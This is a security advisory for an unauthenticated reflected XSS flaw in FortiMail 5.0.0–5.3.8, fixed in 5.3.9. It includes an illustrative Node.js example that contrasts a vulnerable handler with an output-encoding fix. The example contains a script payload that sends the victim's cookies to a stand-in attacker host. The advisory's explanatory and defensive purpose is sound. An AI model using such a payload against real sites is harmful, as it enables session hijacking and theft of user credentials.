PSIRT Advisories

Unauthenticated XSS (Cross Site Scripting) in FortiMail

Summary

An unauthenticated cross-site scripting (XSS) vulnerability could allow an attacker to execute arbitrary script in the browser of a victim who is logged in to FortiMail, in that user's security context, provided the victim is socially engineered into opening a URL crafted by the attacker.
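As an added illustration, and not FortiMail's code or the reporter's finding (the advisory does not name the affected page or parameter), the following Node.js snippet shows the pattern the summary describes: a handler that reflects a URL query parameter into HTML without encoding, the crafted URL an attacker would lure a logged-in victim into opening, and the output-encoded handler that neutralizes it. The hostname, path and parameter name `q` are assumptions for the example.

```javascript
// Added example: reflected XSS via a crafted URL, vulnerable vs. fixed.
// Not FortiMail code; host, path and the parameter name "q" are assumptions.

// HTML-encode the characters that can break out of an HTML text or
// double-quoted attribute context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable handler: the query parameter lands in the page verbatim, so any
// markup in the URL is parsed and executed by the victim's browser with that
// user's session (cookies, CSRF tokens, same-origin access to the app).
function renderSearchVulnerable(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") ?? "";
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// Fixed handler: encode untrusted input for the context it is inserted into
// (here, HTML text), so "<script>" becomes inert "&lt;script&gt;".
function renderSearchFixed(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") ?? "";
  return `<html><body><h1>Results for: ${escapeHtml(q)}</h1></body></html>`;
}

// Quick check a tester would run against a response: did a script element
// from the request survive into the HTML unencoded?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker URL (hypothetical hosts). Note the attacker needs no
// account: the script runs only once a logged-in victim opens the link.
const PAYLOAD = '<script>fetch("https://attacker.test/?c=" + document.cookie)</script>';
const ATTACK_URL = "https://mail.example.test/search?q=" + encodeURIComponent(PAYLOAD);

// Runs stand-alone: prints both renderings for comparison.
console.log("vulnerable:", renderSearchVulnerable(ATTACK_URL));
console.log("fixed:     ", renderSearchFixed(ATTACK_URL));
```

Encoding on output is the fix that removes the bug; a restrictive Content-Security-Policy and HttpOnly session cookies only limit what a successful injection can do and do not substitute for it.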

Affected Products

FortiMail 5.0.0 through 5.2.9

FortiMail 5.3.0 through 5.3.8

Solutions

Upgrade to FortiMail 5.3.9

Acknowledgement

Fortinet is pleased to thank Ebrahim Hegazy for reporting this vulnerability under responsible disclosure.